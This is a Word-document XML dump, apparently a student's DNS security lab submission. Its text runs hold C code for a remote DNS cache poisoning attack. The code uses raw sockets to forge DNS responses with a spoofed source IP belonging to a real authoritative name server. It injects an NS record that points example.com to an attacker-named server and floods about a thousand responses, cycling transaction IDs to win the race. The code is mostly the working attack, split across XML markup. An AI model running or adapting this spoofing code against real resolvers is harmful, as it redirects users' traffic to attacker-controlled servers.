    <w:p w14:paraId="63BADC4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strcpy(p, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2A4E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strlen(name)+1;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CAD6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09B5E5F9" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22443DD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*)p) = htons(0x0002);  // Record type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05971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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482C88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2853446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*)p) = htons(0x0001);  // Class type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73CBB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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B942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1A4EB5F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int *)p) = htonl(0x00002000);  // TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7A7D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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF88A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448B21F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*)p) = htons(0x0017);  // Data Length = 23 here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A23D9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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321D3A5" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C1629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strcpy(p, "\2ns");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF37C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3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CBFA9" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1591B0D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14;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139873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6705066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strcpy(p,"dnslabattacker");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D434F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 += 14;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56012932" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05963CD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strcpy(p, "\3net");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9614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p+=4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50065BE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((struct in_addr *)p)-&gt;s_addr = inet_addr(ip_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF944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p += 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE8B4A5" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73670F0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return p - buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B79D3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4617FB03" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2105715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void send_dns_response(char *url, char *s_addr, char *d_addr) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DADD5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socket descriptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B3E2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int sd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C6AA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buffer to hold the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D49EF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char buffer[PCKT_LEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE39E8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set the buffer to 0 for all bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45ACB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memset(buffer, 0, PCKT_LEN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF8BC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Our own headers' structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1F39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struct ipheader *ip = (struct ipheader *)buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B8902" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C93C35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struct udpheader *udp = (struct udpheader *)(buffer + sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB950CD" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5D6F6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struct dnsheader *dns= (struct dnsheader*)(buffer +sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88E08D" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041B31E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data is the pointer points to the first byte of the dns payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22572D7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char *data= (buffer + sizeof(struct ipheader) + sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578C67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printf("Begin of data section: %p\n", (void *)data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562839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//The flag you need to set is the response </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F392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dns-&gt;flags = htons(FLAG_R);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321872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Now we set the number of question records to 1 , </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BD80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number of answer records to 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AABEE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number of authority records to 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BBA7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number of additional records to 1*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDDCA7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dns-&gt;QDCOUNT = htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADF41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dns-&gt;ANCOUNT = htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A695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dns-&gt;NSCOUNT = htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A288EB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dns-&gt;ARCOUNT = htons(0); // Check if we  should  set it to zero/one ******************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7E76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0175745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strcpy(data, url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC4B1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int length = strlen(data)+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8F737" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C90B9C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//this is for convinience to get the struct type write the 4bytes in a more organized way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77330F3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printf("Checkpoint 1\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBC15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struct dataEnd *end = (struct dataEnd *)(data + length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15949DF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end-&gt;type  = htons(0x0001);  // this is record type in the dns response 0x0001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DD11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end-&gt;class = htons(0x0001);  // this is class type which is Internet(IN) 0x0001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB6BE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60F80D4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Now we frame the answer for the question record above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722729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char *ans = (buffer + sizeof(struct ipheader) + sizeof(struct udpheader) + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F924F0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sizeof(struct dnsheader) + sizeof(struct dataEnd) + length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEFF499" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42877F0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ans += set_A_record(ans, url, 0x0C, "1.2.3.4");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6321FE0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ans += set_NS_record(ans, "\7example\3com", 0x0C, "1.2.3.4"); // Here 1.2.3.4 doesn't matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B000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as we are filling the IP field with ns.dnslabattacker.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCC9D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7937E08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6FAE317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Construction of the packet is done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACEE4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now focus on how to do the settings and send the packet we have composed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D4B3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637A823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Source and destination addresses: IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3970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struct sockaddr_in sin, din;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2505B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5A58026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int one = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60547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73949A5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const int* val = &amp;one;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2D2DB" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8FD2C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sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496177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4D0F6E7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if (sd &lt; 0) // if socket fails to be created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DF8E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printf("socket error\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0713048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7FA04DA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The source is redundant, may be used later if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D017D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The address family</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212FB66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sin.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7452D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din.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B1DBC" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD0730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Port numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA13E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sin.sin_port = htons(53);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039A95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din.sin_port = htons(33333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22E36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487A83A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IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF9926" w14:textId="2B10A4E0" w:rsidR="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="00123127">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   sin.sin_addr.s_addr = inet_addr(d_addr); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E5591" w14:textId="63AAE39F" w:rsidR="00123127" w:rsidRPr="002C29DB" w:rsidRDefault="00123127" w:rsidP="00123127">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>// this is the second argument we input into the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490318DA" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23061026" w14:textId="77777777" w:rsidR="000707AD"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din.sin_addr.s_addr = inet_addr("199.43.135.53"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09FF9" w14:textId="77777777" w:rsidR="00123127" w:rsidRPr="002C29DB" w:rsidRDefault="00123127" w:rsidP="00123127">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>// this is the address i got from dig -x example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2FACC" w14:textId="448CE174" w:rsidR="002C29DB" w:rsidRDefault="00123127" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>// this is the address of a.iana-servers.net reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1FA1A" w14:textId="77777777" w:rsidR="005C7511" w:rsidRPr="002C29DB" w:rsidRDefault="005C7511" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BC31B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Fabricate the IP header or we can use the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCDA08" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD52B7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standard header structures but assign our own values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F24F4C" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D8FE3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ip-&gt;iph_ihl = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E25A8" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33175A0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ip-&gt;iph_ver = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E66B28" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA9AD7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ip-&gt;iph_tos = 0; // Low delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B711A41" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D090FE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packetLength = (sizeof(struct ipheader)+ sizeof(struct udpheader)+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3ADB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sizeof(struct dnsheader)+length+ sizeof(struct dataEnd) + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B2F8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ansLength + sizeof(struct ansEnd) + addrlen +  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBFC6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nslength + sizeof(struct nsEnd) + nsnamelen + addrecLength + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DEC0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sizeof(struct ansEnd) + arcAddrLength);*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323C93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packetLength =  (sizeof(struct ipheader)+ sizeof(struct udpheader)+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC120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sizeof(struct dnsheader) + ans - buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DAEA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ip-&gt;iph_len = htons(packetLength);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA30BE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030C435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ip-&gt;iph_ident = htons(rand()); // generate random identification number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880E65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5411106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ip-&gt;iph_ttl = 110; // hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF928F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43963D4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ip-&gt;iph_protocol = 17; // UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8E77D" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5195906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Source IP address, can use spoofed address here!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2CD0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ip-&gt;iph_sourceip = inet_addr("199.43.135.53");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11B761" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B4D2B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ip-&gt;iph_destip = inet_addr(d_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25038A9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13E8CF3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Fabricate the UDP header. Source port number, redundant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561932B" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B57C8F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udp-&gt;udph_srcport = htons(53);  // source port number DNS Server sends the reply on 53 port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C483BE" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AFEE0E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Destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05A479" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4683B18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udp-&gt;udph_destport = htons(33333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DDCA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714712B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udp-&gt;udph_len = htons(sizeof(struct udpheader) + sizeof(struct dnsheader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5CFB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length + sizeof(struct dataEnd) + ansLength + sizeof(struct ansEnd) +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1EAC9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addrlen + nslength + sizeof(struct nsEnd) + nsnamelen);*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF380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udp-&gt;udph_len = htons(sizeof(struct udpheader) + sizeof(struct dnsheader) + ans - buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4457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3E09F4E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udp_header_size + udp_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04C90A" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A141E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Calculate the checksum for integrity//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666AEAE6" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC2768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ip-&gt;iph_chksum = csum((unsigned short *)buffer, sizeof(struct ipheader) + sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A3EB5" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5496E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udp-&gt;udph_chksum = check_udp_sum(buffer, packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DB3D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385856F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Inform the kernel do not fill up the packet structure. we will build our own...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CBC6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if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) &lt; 0 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4E5F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1816AB5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printf("error\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B8F40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exit(-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76002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0BF031E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18B6658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int count = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862796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dns-&gt;query_id = htons(2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D88AE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dns-&gt;query_id = htons(count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255D75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udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12334ED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5564825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printf("Before the spoof Response successful to dest: \n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8531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if (sendto(sd, buffer, packetLength, 0, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC76D6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printf("packet send error %d which means %s\n",errno,strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC9AB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int trans_id = rand() % 3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187AB2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while (count &lt; 1000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDE72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dns-&gt;query_id = htons(count+2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AE51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recalculate the checksum as we have changed the transaction id of dns header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36149C8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udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC668D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send the packet out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B20DD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if (sendto(sd, buffer, packetLength, 0, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9373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printf("packet send error %d which means %s\n",errno,strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856F69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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FDE7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47727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printf("Response successful to dest: %s\n", d_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF589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close(sd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF72B9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3E512929" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
